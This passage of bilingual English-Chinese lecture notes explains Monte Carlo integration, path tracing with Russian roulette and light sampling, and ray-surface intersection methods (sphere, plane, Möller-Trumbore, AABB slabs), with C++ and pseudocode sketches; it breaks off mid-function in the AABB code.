    Random variable 随机变量:$X_i\sim p(x)$

    Monte Carlo estimator 蒙特卡洛估计量:$F_N=\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}$


    Example: Uniform Monte Carlo Estimator

    ​示例:统一蒙特卡罗估计量

    Uniform random variable 对于均匀随机变量:

    png

    png

    $$\begin{aligned}&X_i\sim p(x)=C \\&\int_a^b p(x)\,\mathrm{d}x=1 \\&\Rightarrow \int_a^b C\,\mathrm{d}x=1 \\&\Rightarrow C=\frac{1}{b-a}\end{aligned}$$

    Uniform random variable 均匀随机变量:$X_i\sim p(x)=\frac1{b-a}$

    Basic Monte Carlo estimator 基本蒙特卡罗估计量:$F_N=\frac{b-a}N\sum_{i=1}^Nf(X_i)$
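
    ​下面是基本蒙特卡罗估计量的一个最小 C++ 草图,以 $\int_0^\pi\sin x\,\mathrm dx=2$ 为例(被积函数为示意选取):

    ```cpp
    #include <cmath>
    #include <cstdio>
    #include <random>

    // F_N = (b-a)/N * Σ f(X_i),X_i 在 [a, b] 上均匀采样。
    int main() {
        const double a = 0.0, b = 3.14159265358979323846;
        const int N = 100000;
        std::mt19937 rng(1);
        std::uniform_real_distribution<double> X(a, b); // X_i ~ p(x)=1/(b-a)
        double sum = 0.0;
        for (int i = 0; i < N; ++i) sum += std::sin(X(rng));
        double FN = (b - a) / N * sum;                  // 应约等于 2
        std::printf("estimate = %f\n", FN);
        return 0;
    }
    ```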


    Monte Carlo Integration

    ​蒙特卡罗积分

    $$\begin{aligned}\int f(x)\mathrm{d}x&=\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}\quad&X_i\sim p(x)\end{aligned}$$

    Some notes:

    一些注意事项:

    • The more samples, the less variance.

      样本越多,方差越小。

    • Sample on $x$, integrate on $x$.

      在 $x$ 上采样,在 $x$ 上积分。

    Path Tracing

    ​路径追踪

    Motivation: Whitted-Style Ray Tracing

    ​动机:Whitted 式光线追踪

    Whitted-style ray tracing:

    ​Whitted 式光线追踪:

    • Always perform specular reflections / refractions

      始终执行镜面反射/折射

    • Stop bouncing at diffuse surfaces

      停止在漫反射表面反弹

    Are these simplifications reasonable?

    ​这些简化合理吗?

    High level: let’s progressively improve upon Whitted-Style Ray Tracing and lead to our path tracing algorithm!

    ​高层次:让我们逐步改进 Whitted 风格的光线追踪并引出我们的路径追踪算法!


    Whitted-Style Ray Tracing: Problem 1

    ​Whitted 式光线追踪:问题 1

    Where should the ray be reflected for glossy materials?

    ​对于光泽材质来说,射线应该在哪里反射?

    png

    ​应为 Glossy reflection,物体接受光和其它物体反射过来的光。


    No reflections between diffuse materials?

    ​漫反射材质之间没有反射吗?

    png

    ​应为右边,物体(如长方体)接受光和其它物体反射(如红墙壁)过来的光。


    Whitted-Style Ray Tracing is Wrong

    ​Whitted 式光线追踪是错误的

    But the rendering equation is correct

    ​但渲染方程是正确的

    $$L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    But it involves

    ​但它涉及

    • Solving an integral over the hemisphere, and

      求解半球上的积分,以及

    • Recursive execution

      递归执行

    How do you solve an integral numerically?

    ​如何用数值方法求解积分?


    A Simple Monte Carlo Solution

    ​简单的蒙特卡罗解决方案

    Suppose we want to render one pixel (point) in the following scene for direct illumination only

    ​假设我们想在以下场景中渲染一个像素(点),仅用于直接照明

    Note: this is an area light

    png

    Abuse the concept of Reflection Equation a little bit

    ​稍微滥用一下反射方程的概念

    $$L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    (again, we assume all directions are pointing outwards)

    ​(再次假设所有方向都指向外面)

    Fancy as it is, it’s still just an integration over directions

    ​尽管看起来花哨,它仍然只是一个关于方向的积分

    png

    So, of course we can solve it using Monte Carlo integration!

    ​因此,我们当然可以使用蒙特卡洛积分来解决这个问题!

    We want to compute the radiance at $p$ towards the camera

    ​我们想要计算 $p$ 处朝向相机的辐射度

    $$\begin{aligned}L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm d\omega_i\end{aligned}$$

    Monte Carlo integration:

    ​蒙特卡洛积分:

    $$\int_a^b f(x)\,\mathrm{d}x\approx\frac1N\sum_{k=1}^N\frac{f(X_k)}{p(X_k)}\quad X_k\sim p(x)$$

    What’s our “$f(x)$”?

    $$L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$$

    What’s our pdf?

    $$p(\omega_i)=1/2\pi$$

    (assume uniformly sampling the hemisphere)

    ​(假设对半球进行均匀采样)

    So, in general

    $$\begin{aligned}
    L_o(p,\omega_o)&=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\,\mathrm d\omega_i \\
    &\approx\frac1N\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}
    \end{aligned}$$

    (note: abuse notation a little bit for $i$)

    ​(注意:对 $i$ 的符号有点滥用)

    What does it mean?

    ​这是什么意思?

    A correct shading algorithm for direct illumination!

    ​直接照明的正确着色算法!

    $$L_o(p,\omega_o)\approx\frac{1}{N}\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}$$


    ```
    shade(p, wo)
        Randomly choose N directions wi ~ pdf
        Lo = 0.0
        For each wi
            Trace a ray r(p, wi)
            If ray r hit the light
                Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)
        Return Lo
    ```


    Introducing Global Illumination

    ​全局照明简介

    One more step forward: what if a ray hits an object?

    png

    $Q$ also reflects light to $P$! How much? The dir. illum. at $Q$!

    ​$Q$ 也反射光到 $P$!反射了多少?等于 $Q$ 处的直接光照 (dir. illum.)!


    ```
    shade(p, wo)
        Randomly choose N directions wi ~ pdf
        Lo = 0.0
        For each wi
            Trace a ray r(p, wi)
            If ray r hit the light
                Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)
            Else If ray r hit an object at q
                Lo += (1 / N) * shade(q, -wi) * f_r * cosine / pdf(wi)
        Return Lo
    ```


    Path Tracing

    ​路径追踪

    Problem 1: Explosion of #rays as #bounces go up:

    png

    ​光线经过几次反射,所产生的光线数量就过多了,显卡就算不过来了。

    From now on, we always assume that only 1 ray is traced at each shading point:

    ​从现在开始,我们始终假设每个着色点只追踪 1 条射线:


    ```
    shade(p, wo)
        Randomly choose ONE direction wi ~ pdf(w)   // 不用 for 循环了
        Trace a ray r(p, wi)
        If ray r hit the light
            Return L_i * f_r * cosine / pdf(wi)
        Else If ray r hit an object at q
            Return shade(q, -wi) * f_r * cosine / pdf(wi)
    ```


    This is path tracing! (FYI, Distributed Ray Tracing if $N \ne 1$)

    ​这是路径追踪! (仅供参考,如果 $N\ne 1$,则为分布式光线追踪)


    Ray Generation

    ​射线生成

    png

    But this will be noisy!

    ​但是这样会产生很多噪声!

    No problem, just trace more paths through each pixel and average their radiance!

    ​没问题,只需让每个像素追踪更多条路径,并对它们的辐射度取平均!


    Very similar to ray casting in ray tracing

    ​与光线追踪中的光线投射非常相似


    ```
    ray_generation(camPos, pixel)
        Uniformly choose N sample positions within the pixel
        pixel_radiance = 0.0
        For each sample in the pixel
            Shoot a ray r(camPos, cam_to_sample)
            If ray r hit the scene at p
                pixel_radiance += 1 / N * shade(p, sample_to_cam)
        Return pixel_radiance
    ```


    Now are we good? Any other problems in shade()?


    ```
    shade(p, wo)
        Randomly choose ONE direction wi ~ pdf(w)
        Trace a ray r(p, wi)
        If ray r hit the light
            Return L_i * f_r * cosine / pdf(wi)
        Else If ray r hit an object at q
            Return shade(q, -wi) * f_r * cosine / pdf(wi)
    ```


    Problem 2: The recursive algorithm will never stop! 递归算法,无限递归!


    ​如果人为限定光线反弹次数:

    Dilemma: the light does not stop bouncing indeed!

    ​困境:光线确实不会停止反弹!

    Cutting #bounces == cutting energy!

    ​减少反弹 == 减少能量!

    png

    png

    ​如此做,3 bounces 和 17 bounces 的亮度是不一样的。


    Solution: Russian Roulette (RR)

    ​解决方案:俄罗斯轮盘赌(RR)

    Russian Roulette is all about probability

    ​俄罗斯轮盘赌完全是概率游戏

    With probability $0 < P < 1$, you are fine

    ​以概率 $P$($0 < P < 1$),你安然无恙

    With probability $1 - P$, otherwise

    ​以概率 $1 - P$,则是另一种情况

    png

    Previously, we always shoot a ray at a shading point and get the shading result $L_o$

    ​以前,我们总是向着色点发射射线并得到着色结果 $L_o$

    Suppose we manually set a probability $P (0 < P < 1)$

    ​假设我们手动设置一个概率 $P (0 < P < 1)$

    With probability $P$, shoot a ray and return the shading result divided by $P$: $L_o / P$

    ​以概率 $P$,发射一条射线并返回除以 $P$ 的着色结果:$L_o / P$

    With probability $1-P$, don’t shoot a ray and you’ll get $0$

    ​以概率 $1-P$,不发射射线,您将得到 $0$

    In this way, you can still expect to get $L_o$! :

    ​这样,您仍然可以期望得到 $L_o$!:

    $E = P \cdot (L_o / P) + (1 - P) \cdot 0 = L_o$


    ```
    shade(p, wo)
        Manually specify a probability P_RR
        Randomly select ksi in a uniform dist. in [0, 1]
        If (ksi > P_RR) return 0.0
        Randomly choose ONE direction wi ~ pdf(w)
        Trace a ray r(p, wi)
        If ray r hit the light
            Return L_i * f_r * cosine / pdf(wi) / P_RR
        Else If ray r hit an object at q
            Return shade(q, -wi) * f_r * cosine / pdf(wi) / P_RR
    ```


    Now we already have a correct version of path tracing!

    ​现在我们已经有了正确版本的路径追踪!

    But it’s not really efficient.

    ​但它并不是很高效。

    png


    Sampling the Light

    ​光采样

    Understanding the reason of being inefficient

    ​了解效率低下的原因

    png

    there will be 1 ray hitting the light. So a lot of rays are “wasted” if we uniformly sample the hemisphere at the shading point.

    ​会有 1 条射线击中光源。因此,如果我们在着色点处均匀采样半球,则很多射线都会被“浪费”。


    Sampling the Light (pure math)

    ​光采样(纯数学)

    png

    Monte Carlo methods allows any sampling methods, so we can sample the light (therefore no rays are “wasted”)

    ​蒙特卡罗方法允许任何采样方法,因此我们可以对光进行采样(因此不会“浪费”任何光线)

    Assume uniformly sampling on the light:

    ​假设对光进行均匀采样:

    $\text{pdf} = 1 / A (\text{because} \int\text{pdf d}A = 1)$

    But the rendering equation integrates on the solid angle 但渲染方程在立体角上积分: $L_o = \int L_i fr \cos d\omega$.

    Recall Monte Carlo Integration

    ​回想一下蒙特卡罗积分:

    Sample on $x$ & integrate on $x$

    ​在 $x$ 上采样并在 $x$ 上积分

    Since we sample on the light, can we integrate on the light?

    ​由于我们在光上采样,我们可以在光上积分吗?

    Need to make the rendering equation as an integral of $\text dA$

    ​需要将渲染方程作为 $\text dA$ 的积分

    Need the relationship between $\text d\omega$ and $\text dA$

    ​需要 $\text d\omega$ 和 $\text d A$ 之间的关系

    Easy! Recall the alternative def. of solid angle:

    ​简单!回想一下立体角的另一种定义:

    Projected area on the unit sphere

    ​单位球面上的投影面积

    $$d\omega=\frac{dA\cos\theta{\prime}}{|x{\prime}-x|^2}$$

    Then we can rewrite the rendering equation as

    ​然后我们可以将渲染方程重写为

    $$\begin{aligned}
    L_o(x,\omega_o)& \begin{aligned}=\int_{\Omega^+}L_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\cos\theta\mathrm d\omega_i\end{aligned} \
    &\begin{aligned}&=\int_AL_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\frac{\cos\theta\cos\theta’}{|x’-x|^2}\mathrm dA\end{aligned}
    \end{aligned}$$

    Now an integration on the light!

    ​现在对光进行积分!

    Monte Carlo integration:

    ​蒙特卡洛积分:

    “$f(x)$”: everything inside 里面的一切

    $\text{Pdf}: 1 / A$

    png

    Previously, we assume the light is “accidentally” shot by uniform hemisphere sampling

    ​之前,我们假设光线是“意外地”通过均匀半球采样射出的

    Now we consider the radiance coming from two parts:

    ​现在我们考虑来自两部分的辐射:

    1. light source (direct, no need to have RR)

      光源(直接,不需要 RR)

    2. other reflectors (indirect, RR)

      其他反射器(间接,RR)


    shade(p, wo)

    ​# Contribution from the light source.

    Uniformly sample the light at x’ (pdf_light = 1 / A)

    ​L_dir = L_i * f_r * cos θ * cos θ’ / |x’ - p|^2 / pdf_light

    ​# Contribution from other reflectors.

    ​L_indir = 0.0

    ​Test Russian Roulette with probability P_RR

    Uniformly sample the hemisphere toward wi (pdf_hemi = 1 / 2pi)

    ​Trace a ray r(p, wi)

    ​If ray r hit a non-emitting object at q

    ​L_indir = shade(q, -wi) * f_r * cos θ / pdf_hemi / P_RR

    ​Return L_dir + L_indir


    One final thing: how do we know if the sample on the light is not blocked or not?

    ​最后一件事:我们如何知道光上的样本是否被遮挡?

    png


    # Contribution from the light source.

    L_dir = 0.0

    Uniformly sample the light at x’ (pdf_light = 1 / A)

    Shoot a ray from p to x’

    If the ray is not blocked in the middle

    ​L_dir = …


    Now path tracing is finally done!


    Some Side Notes

    ​一些补充说明

    • Path tracing (PT) is indeed difficult

      路径追踪 (PT) 确实很难

      • Consider it the most challenging in undergrad CS

        认为它是本科计算机科学中最具挑战性的

      • Why: physics, probability, calculus, coding

        原因:物理、概率、微积分、编码

      • Learning PT will help you understand deeper in these

        学习 PT 将帮助您更深入地理解这些

    • Is it still “Introductory”?

      它仍然是“入门级”吗?

      • Not really, but it’s “modern" :)

        不是,但它是“现代” :)

      • And so learning it will be rewarding also because …

        因此学习它也会很有价值,因为……


    Is Path Tracing Correct?

    ​Yes, almost 100% correct, a.k.a. PHOTO-REALISTIC

    ​是的,几乎 100% 正确,又名照片级真实感

    png


    Ray tracing: Previous vs. Modern Concepts

    ​光线追踪:过去与现代概念

    • Previous

      早期

      • Ray tracing == Whitted-style ray tracing

        光线追踪 == Whitted 式光线追踪

    • Modern (my own definition)

      现代(我自己的定义)

      • The general solution of light transport, including

        光传输的一般解决方案,包括

      • (Unidirectional & bidirectional) path tracing

    (单向和双向)路径追踪

    • Photon mapping

      光子映射

    • Metropolis light transport

      Metropolis 光传输

    • VCM / UPBP…


    Things we haven’ t covered / won’ t cover

    ​我们没有涉及/不会涉及的内容

    • Uniformly sampling the hemisphere

      均匀采样半球

      • How? And in general, how to sample any function? (sampling)

        如何采样?一般来说,如何采样任何函数? (采样)

    • Monte Carlo integration allows arbitrary pdfs

      蒙特卡罗积分允许任意 pdf

      • What’s the best choice? (importance sampling)

        最佳选择是什么? (重要性采样)

    • Do random numbers matter?

      随机数重要吗?

      • Yes! (low discrepancy sequences)

        是的! (低差异序列)

    • I can sample the hemisphere and the light

      我可以对半球和光线进行采样

      • Can I combine them? Yes! (multiple imp. sampling)

        我可以将它们结合起来吗?是的!(多重采样)

    • The radiance of a pixel is the average of radiance on all
      paths passing through it

      像素的辐射度是通过它的所有路径的辐射度的平均值

      • Why? (pixel reconstruction filter)

        为什么?(像素重建滤波器)

    • Is the radiance of a pixel the color of a pixel?

      像素的辐射度是像素的颜色吗?

      • No. (gamma correction, curves, color space)

        不是。(伽马校正、曲线、色彩空间)

    • Asking again, is path tracing still “Introductory”?

      再次询问,路径追踪仍然是“入门级”吗?

      • This time, yes. Fear the science, my friends.

        这次是的。朋友们,敬畏科学吧。

    ]]>
    + 资源

    课程

    Lecture 13: Ray Tracing 1 (Whitted-Style Ray Tracing)

    Why Ray Tracing?

    png

    Soft shadows

    ​软阴影

    Glossy reflection

    ​光泽反射

    Indirect illumination

    ​间接照明

• Rasterization couldn’t handle global effects well

    光栅化无法很好地处理全局效果

    • (Soft) shadows

    (软)阴影

    • And especially when the light bounces more than once

      尤其是当光线反弹不止一次时


    png

    Rasterization is fast, but quality is relatively low

    ​光栅化速度快,但质量相对较低

Early games looked low-quality because their worlds were so large that image quality had to be sacrificed to keep performance acceptable.


    png

For tasks that do not require real-time rendering, ray tracing can produce excellent results.

    • Ray tracing is accurate, but is very slow

      光线追踪很精确,但速度很慢

      • Rasterization: real-time, ray tracing: offline

        光栅化:实时,光线追踪:离线

      • ~10K CPU core hours to render one frame in production

        在生产中渲染一帧图像需要 ~10K CPU 核心小时

    Basic Ray-Tracing Algorithm

    Light Rays

    ​光线

    Three ideas about light rays

    关于光线的三种观点

    1. Light travels in straight lines (though this is wrong)

      光是直线传播的(尽管这是错误的)

    2. Light rays do not “collide” with each other if they cross (though this is still wrong)

      光线交叉时不会相互 “碰撞”(尽管这仍然是错误的)

3. Light rays travel from the light sources to the eye (but the physics is invariant under path reversal, i.e. reciprocity).

      光线从光源到眼睛传播(但物理规律在路径反向-互易性下保持不变)

    “And if you gaze long into an abyss, the abyss also gazes into you.” — Friedrich Wilhelm Nietzsche (translated)

    ​当你在凝视深渊时,深渊也在凝视你。


    Emission Theory of Vision

Emission theory of vision: the belief that we see because our eyes emit rays that land on objects. It is wrong, but it is a useful source of inspiration for ray tracing.

    png

“For every complex problem there is an answer that is clear, simple, and wrong.” — H. L. Mencken

    ​每一个复杂的问题都有一个清晰、简单和错误的答案。


    Ray Casting

    ​射线投射

    png

    1. Generate an image by casting one ray per pixel

      通过为每个像素投射一条光线生成图像

    2. Check for shadows by sending a ray to the light

      通过向光源发送光线检查阴影


    Ray Casting - Generating Eye Rays

    ​从眼睛处发出射线

    Pinhole Camera Model

    ​针孔摄像机模型

    png

Cast a ray from the eye through each pixel; the first object the ray hits is the one seen.


    Ray Casting - Shading Pixels (Local Only)

    ​给像素着色

    png

From the visible point, the light direction, the surface normal, the material and other parameters, we can compute the color of the observed pixel.


    Recursive (Whitted-Style) Ray Tracing

Recursive (Whitted-style) ray tracing: a step up from the ray casting algorithm above.

    png

“An Improved Illumination Model for Shaded Display”, T. Whitted, CACM 1980

    Time:

    • VAX 11/780 (1979) 74m

  It took 74 minutes to render at the time.

    • PC (2006) 6s

    • GPU (2012) 1/30s


    png

Rays from the eye bounce off surfaces and continue onward to other surfaces.


    png

Refraction can occur as well.


    png

Lighting is then computed at each hit point; if the path to the light is blocked, the point is in shadow.

    Ray-Surface Intersection

Ray-surface intersection: next, how is the intersection of a ray with a surface computed?

    png

    Ray is defined by its origin and a direction vector

    ​射线由其原点 $\mathbf{o}$ 和方向矢量 $\mathbf d$ 定义

    Ray equation:

    png

Define the ray by the time $t$ since it was cast:

    $$\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\quad0\leq t<\infty $$


    Ray Intersection With Sphere

    ​射线与球面的交点

    Ray: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\mathrm{}0\leq t<\infty $

Sphere: $\mathbf p:(\mathbf p-\mathbf c)^2-R^2=0$

    What is an intersection?

    ​什么是交点?

The intersection $\mathbf p$ must satisfy both the ray equation and the sphere equation

    ​交点 $\mathbf p$ 必须同时满足射线方程和球面方程,联立两个方程即可。

    png

    Solve for intersection:

$$(\mathbf{o}+t\mathbf{d}-\mathbf{c})^2-R^2=0$$

    png

$$\begin{aligned}
&at^2+bt+c=0,\ \text{where}\\
&a=\mathbf{d}\cdot\mathbf{d}\\
&b=2(\mathbf{o}-\mathbf{c})\cdot\mathbf{d}\\
&c=(\mathbf{o}-\mathbf{c})\cdot(\mathbf{o}-\mathbf{c})-R^2\\
&t=\frac{-b\pm\sqrt{b^2-4ac}}{2a}
\end{aligned}$$

This is just solving a quadratic equation.
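For illustration, the quadratic translates directly into code; a minimal C++ sketch (the types and names are ours, not course code) that returns the nearest non-negative $t$, or $-1$ on a miss:

#include <cmath>

struct Vec3 { double x, y, z; };
double dot(const Vec3& a, const Vec3& b) { return a.x*b.x + a.y*b.y + a.z*b.z; }
Vec3 sub(const Vec3& a, const Vec3& b) { return { a.x-b.x, a.y-b.y, a.z-b.z }; }

// Solve (o + t d - c)^2 - R^2 = 0 for the smallest t >= 0; returns -1 on a miss.
double raySphere(const Vec3& o, const Vec3& d, const Vec3& c, double R) {
    Vec3 oc = sub(o, c);
    double a = dot(d, d);
    double b = 2.0 * dot(oc, d);
    double cc = dot(oc, oc) - R * R;
    double disc = b * b - 4.0 * a * cc;
    if (disc < 0.0) return -1.0;             // no real root: the ray misses the sphere
    double sq = std::sqrt(disc);
    double t = (-b - sq) / (2.0 * a);        // near root first
    if (t < 0.0) t = (-b + sq) / (2.0 * a);  // origin inside the sphere: take the far root
    return (t >= 0.0) ? t : -1.0;
}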


    Ray Intersection With Implicit Surface

    Ray 射线方程: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\mathrm{}0\leq t<\infty$

    General implicit surface 一般隐式曲面: $\mathbf{p}:f(\mathbf{p})=0$

    Substitute ray equation 将射线方程代入: $f(\mathbf{o}+t\mathbf{d})=0$

    Solve for real, positive roots 求解实数正根:

    png

Equations of this form are easy for a computer to solve numerically!


    Ray Intersection With Triangle Mesh

But geometry is usually represented with polygon meshes; how do we intersect those?

    png

    Why?

    • Rendering: visibility, shadows, lighting…

      渲染:可见度、阴影、 光照…

    • Geometry: inside/outside test

      几何:内部/外部测试

    How to compute?

    ​如何计算?

Let’s break this down:

    ​让我们来分析一下:

    • Simple idea: just intersect ray with each triangle

      简单的想法:只需将射线与每个三角形相交即可

    • Simple, but slow (acceleration?)

      简单,但速度慢(加速?)

    • Note: can have 0, 1 intersections (ignoring multiple intersections)

      注意:可以有 0 个、1 个交点 (忽略多个交点)


    Ray Intersection With Triangle

    png

    Triangle is in a plane

    ​三角形位于平面内

    • Ray-plane intersection

      射线与平面相交

    • Test if hit point is inside triangle

      测试命中点是否位于三角形内

    Many ways to optimize…

    ​优化方法有很多…


    Plane Equation

    ​平面方程

    Plane is defined by normal vector and a point on plane

    ​平面由法向量和平面上的一个点定义

    Example:

    png

    Plane Equation (if $p$ satisfies it, then $p$ is on the plane):

    ​平面方程(若 $p$ 满足该方程,则 $p$ 在平面上):

    png


    Ray Intersection With Plane

    Ray equation: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},0\leq t<\infty $

    Plane equation: $\mathbf{p}:(\mathbf{p}-\mathbf{p}^{\prime})\cdot\mathbf{N}=0$

    Solve for intersection: 将两个方程联立,求解

    $\text{Set }\mathbf{p}=\mathbf{r}(t)\text{ and solve for }t$

    $\mathbf{(p-p^{\prime})\cdot N=(o+td-p^{\prime})\cdot N=0}$

$t=\frac{(\mathbf{p}^{\prime}-\mathbf{o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}}\qquad\textsf{Check: }0\leq t<\infty$


    Möller Trumbore Algorithm

    A faster approach, giving barycentric coordinate directly

    ​一种更快的方法(判断射线是否经过三角形面),直接给出重心坐标

    Recall: How to determine if the “intersection” is inside the triangle?

    ​回想一下:如何确定“交点”是否在三角形内部?

    $$\vec{\mathbf{O}}+t\vec{\mathbf{D}}=(1-b_1-b_2)\vec{\mathbf{P}}_0+b_1\vec{\mathbf{P}}_1+b_2\vec{\mathbf{P}}_2$$

Express the point where the ray hits the plane in the triangle's barycentric coordinates.

    Hint: $(1-b_1-b_2), b_1, b_2$ are barycentric coordinates!

    ​提示:$(1-b_1-b_2),b_1,b_2$ 是重心坐标!

$$\begin{bmatrix}t\\b_1\\b_2\end{bmatrix}=\frac{1}{\vec{\mathbf{S}}_1\cdot\vec{\mathbf{E}}_1}\begin{bmatrix}\vec{\mathbf{S}}_2\cdot\vec{\mathbf{E}}_2\\\vec{\mathbf{S}}_1\cdot\vec{\mathbf{S}}\\\vec{\mathbf{S}}_2\cdot\vec{\mathbf{D}}\end{bmatrix}$$

where $\vec{\mathbf{E}}_1=\vec{\mathbf{P}}_1-\vec{\mathbf{P}}_0$, $\vec{\mathbf{E}}_2=\vec{\mathbf{P}}_2-\vec{\mathbf{P}}_0$, $\vec{\mathbf{S}}=\vec{\mathbf{O}}-\vec{\mathbf{P}}_0$, $\vec{\mathbf{S}}_1=\vec{\mathbf{D}}\times\vec{\mathbf{E}}_2$, $\vec{\mathbf{S}}_2=\vec{\mathbf{S}}\times\vec{\mathbf{E}}_1$.

    $\text{Cost}=(1 \text{div}, 27 \text{mul} ,17 \text{add})$

    ​需要 1 次除,27 次乘,17 次加。
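A C++ sketch of the algorithm (the types and helper names are ours); a hit requires $t \ge 0$ and all three barycentric coordinates non-negative:

#include <cmath>

struct Vec3 { double x, y, z; };
Vec3 cross(const Vec3& a, const Vec3& b) {
    return { a.y*b.z - a.z*b.y, a.z*b.x - a.x*b.z, a.x*b.y - a.y*b.x };
}
double dot(const Vec3& a, const Vec3& b) { return a.x*b.x + a.y*b.y + a.z*b.z; }
Vec3 operator-(const Vec3& a, const Vec3& b) { return { a.x-b.x, a.y-b.y, a.z-b.z }; }

// Möller-Trumbore: true (and t, b1, b2 filled) if ray O + tD hits triangle P0 P1 P2.
bool mollerTrumbore(const Vec3& O, const Vec3& D,
                    const Vec3& P0, const Vec3& P1, const Vec3& P2,
                    double& t, double& b1, double& b2) {
    Vec3 E1 = P1 - P0, E2 = P2 - P0;
    Vec3 S  = O - P0;
    Vec3 S1 = cross(D, E2), S2 = cross(S, E1);
    double denom = dot(S1, E1);
    if (std::fabs(denom) < 1e-12) return false;   // ray parallel to the triangle plane
    double inv = 1.0 / denom;                     // the single division
    t  = dot(S2, E2) * inv;
    b1 = dot(S1, S)  * inv;
    b2 = dot(S2, D)  * inv;
    // Inside the triangle iff all barycentric coordinates are non-negative, and t >= 0.
    return t >= 0.0 && b1 >= 0.0 && b2 >= 0.0 && (1.0 - b1 - b2) >= 0.0;
}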

    Accelerating Ray-Surface Intersection

    ​加速计算射线-表面交点的方法

    Ray Tracing – Performance Challenges

    Simple ray-scene intersection

    ​简单的光线场景交点

    • Exhaustively test ray-intersection with every triangle

      详尽地测试每个三角形的光线交点

    • Find the closest hit (i.e. minimum $t$)

      找到最接近的命中点(即最小 $t$)

    Problem:

    ​问题:

• Naive algorithm = #pixels ⨉ #triangles (⨉ #bounces)

      简单算法 = #像素 ⨉ #三角形(⨉ #反射)

    • Very slow!

      非常慢!

For generality, we use the term objects instead of triangles later (but it doesn’t necessarily mean entire objects)

​为了通用,我们稍后使用术语“对象”而不是三角形(但并不一定意味着整个对象)

    png

    png

Meshes like these have thousands of faces; rendering them this way would be far too slow.

    Bounding Volumes

    png

    Quick way to avoid intersections: bound complex object with a simple volume

    ​避免上面计算相交的快速方法:用简单体积绑定复杂物体

    • Object is fully contained in the volume

      物体完全包含在包围盒中

• If it doesn’t hit the volume, it doesn’t hit the object

  If the ray misses the bounding volume, it cannot hit the object, so all further intersection tests are skipped; if it does hit, fall back to the exact tests.

    • So test BVol first, then test object if it hit

      因此,首先测试 BVol,然后测试物体是否击中


    Ray-Intersection With Box

    ​射线与盒子的相交

    Understanding: box is the intersection of 3 pairs of slabs

理解:包围盒是三对无限大平板(slab)的交集。

    png

    Specifically:

    ​具体来说:

    We often use an Axis-Aligned Bounding Box (AABB)

    ​我们经常使用轴对齐包围盒 (AABB)

    i.e. any side of the BB is along either $x$, $y$, or $z$ axis

    ​即 BB 的任何一侧都沿着 $x$、$y$ 或 $z$ 轴


    Ray Intersection with Axis-Aligned Box

    png

In 2D: intersect the ray with the $x_0$/$x_1$ planes to get one interval of $t$, intersect it with the $y_0$/$y_1$ planes to get another, and take the intersection of the two intervals; that is where the ray is inside the box.

    2D example; 3D is the same! Compute intersections with slabs and take intersection of $t_{min}/t_{max}$ intervals.

    ​2D 示例;3D 也一样!计算与板块的交点并取 $t_{min}/t_{max}$ 间隔的交点

    How do we know when the ray intersects the box?

    ​我们如何知道射线何时与盒子相交?


    • Recall: a box (3D) = three pairs of infinitely large slabs

      回想一下:一个盒子(3D)= 三对无限大的平板

    • Key ideas

      关键思想

      • The ray enters the box only when it enters all pairs of slabs

        只有当射线进入所有平板对时,它才会进入盒子

      • The ray exits the box as long as it exits any pair of slabs

        只要射线离开任何一对平板,它就会离开盒子

    • For each pair, calculate the $t_{\text{min}}$ and $t_\text{max}$ (negative is fine)

      对于每一对,计算 $t_{\text{min}}$ 和 $t_\text{max}$(负数也可以)

• For the 3D box, $t_{\text{enter}} = \max\{t_{\text{min}}\}$, $t_{\text{exit}} = \min\{t_{\text{max}}\}$

  对于 3D 盒子,$t_{\text{enter}} = \max\{t_{\text{min}}\}$,$t_{\text{exit}} = \min\{t_{\text{max}}\}$

    • If $t_{\text{enter}} < t_{\text{exit}}$, we know the ray stays a while in the box
      (so they must intersect!)

      如果 $t_{\text{enter}} < t_{\text{exit}}$,我们知道射线会在盒子中停留一段时间(所以它们一定相交!)


• However, ray is not a line

  但是,射线不是直线

  • Should check whether $t$ is negative for physical correctness!

    应检查 $t$ 是否为负数以确保物理正确性!
    • What if $t_\text{exit} < 0$?

      • The box is “behind” the ray — no intersection!

        盒子在射线“后面” ——没有相交!

• What if $t_{\text{exit}} \ge 0$ and $t_{\text{enter}} < 0$?

  • The ray’s origin is inside the box — have intersection!

    射线的原点在盒子内部 — 有相交!

    • In summary, ray and AABB intersect iff

      综上所述,射线与 AABB 相交,当且仅当

  • $t_{\text{enter}} < t_{\text{exit}}$ && $t_{\text{exit}} \ge 0$
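In code, the whole test is a few lines per slab pair; a sketch (names are ours) that, for brevity, assumes no ray direction component is exactly zero — production code special-cases that:

#include <algorithm>

// Ray o + t d vs. AABB [pmin, pmax]: three pairs of slabs, one per axis.
bool rayAABB(const double o[3], const double d[3],
             const double pmin[3], const double pmax[3]) {
    double tEnter = -1e30, tExit = 1e30;
    for (int a = 0; a < 3; ++a) {
        double t0 = (pmin[a] - o[a]) / d[a];   // hit times of the two slab planes
        double t1 = (pmax[a] - o[a]) / d[a];
        if (t0 > t1) std::swap(t0, t1);        // a negative d[a] flips the pair
        tEnter = std::max(tEnter, t0);         // enter only after entering ALL slabs
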